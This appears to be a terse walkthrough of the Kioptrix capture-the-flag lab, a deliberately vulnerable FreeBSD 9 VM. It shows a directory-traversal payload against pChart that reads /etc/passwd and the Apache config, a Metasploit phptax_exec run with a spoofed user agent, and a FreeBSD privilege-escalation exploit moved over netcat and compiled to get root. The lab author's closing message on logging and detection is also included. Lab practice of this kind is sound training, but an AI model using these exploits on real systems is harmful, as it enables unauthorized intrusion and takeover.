nmap -sV -sC -sT -p- 10.X.X.X


pChart2.1.3/index.php

|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

https://www.exploit-db.com/exploits/31173

|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

index.php?Action=View&Script=%2f..%2f..%2fetc/passwd



# $FreeBSD: release/9.0.0/etc/master.passwd 218047 2011-01-28 22:29:38Z pjd $
#
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
hast:*:845:845:HAST unprivileged user:/var/empty:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
mysql:*:88:88:MySQL Daemon:/var/db/mysql:/usr/sbin/nologin
ossec:*:1001:1001:User &:/usr/local/ossec-hids:/sbin/nologin
ossecm:*:1002:1001:User &:/usr/local/ossec-hids:/sbin/nologin
ossecr:*:1003:1001:User &:/usr/local/ossec-hids:/sbin/nologin


|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

usr/local/etc/apache/httpd.conf 


http://10.X.X.X/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf

|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

Allow from env=Mozilla4_browser


change mozilla 4

|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

http://10.X.X.X:8080/phptax/

lets find out phptax exploit

|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||


https://www.rapid7.com/db/modules/exploit/multi/http/phptax_exec/

msfconsole

msf > use exploit/multi/http/phptax_exec
msf exploit(phptax_exec) > show targets
    ...targets...
msf exploit(phptax_exec) > set TARGET < target-id >
msf exploit(phptax_exec) > show options
    ...show and set options...
msf exploit(phptax_exec) > exploit

|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

set rhost and rport
after you can exploit

dont forget to chosee payload!!


|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

show advanced options
change the Mozilla 5.0  to 4.0

Mozilla/4.0 (Windows NT 10.0; Win64; x64) AppleWebKiMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKiMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKi

|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

set UserAgent Mozilla/4.0 (Windows NT 10.0; Win64; x64) AppleWebKiMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKiMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKi

exploit


|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

lets search -> freebsd 9 privilege escalation

https://www.exploit-db.com/exploits/28718

|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

cat 28718.c | nc -l -p 1234

nc 10.X.X.X 1234 > privilege.c


|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

gcc privilege.c -o privilege


chmod +x privilege
./privilege

|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

whoami
root
cd /
cd root


cat congrats.txt
If you are reading this, it means you got root (or cheated).
Congratulations either way...

Hope you enjoyed this new VM of mine. As always, they are made for the beginner in 
mind, and not meant for the seasoned pentester. However this does not mean one 
can't enjoy them.

As with all my VMs, besides getting "root" on the system, the goal is to also
learn the basics skills needed to compromise a system. Most importantly, in my mind,
are information gathering & research. Anyone can throw massive amounts of exploits
and "hope" it works, but think about the traffic.. the logs... Best to take it
slow, and read up on the information you gathered and hopefully craft better
more targetted attacks. 

For example, this system is FreeBSD 9. Hopefully you noticed this rather quickly.
Knowing the OS gives you any idea of what will work and what won't from the get go.
Default file locations are not the same on FreeBSD versus a Linux based distribution.
Apache logs aren't in "/var/log/apache/access.log", but in "/var/log/httpd-access.log".
It's default document root is not "/var/www/" but in "/usr/local/www/apache22/data".
Finding and knowing these little details will greatly help during an attack. Of course
my examples are specific for this target, but the theory applies to all systems.

As a small exercise, look at the logs and see how much noise you generated. Of course
the log results may not be accurate if you created a snapshot and reverted, but at least
it will give you an idea. For fun, I installed "OSSEC-HIDS" and monitored a few things.
Default settings, nothing fancy but it should've logged a few of your attacks. Look
at the following files:
/root/folderMonitor.log
/root/httpd-access.log (softlink)
/root/ossec-alerts.log (softlink)

The folderMonitor.log file is just a cheap script of mine to track created/deleted and modified
files in 2 specific folders. Since FreeBSD doesn't support "iNotify", I couldn't use OSSEC-HIDS 
for this.
The httpd-access.log is rather self-explanatory .
Lastly, the ossec-alerts.log file is OSSEC-HIDS is where it puts alerts when monitoring certain
files. This one should've detected a few of your web attacks.

Feel free to explore the system and other log files to see how noisy, or silent, you were.
And again, thank you for taking the time to download and play.
Sincerely hope you enjoyed yourself.

Be good...


loneferret
http://www.kioptrix.com


p.s.: Keep in mind, for each "web attack" detected by OSSEC-HIDS, by
default it would've blocked your IP (both in hosts.allow & Firewall) for
600 seconds. I was nice enough to remove that part :)


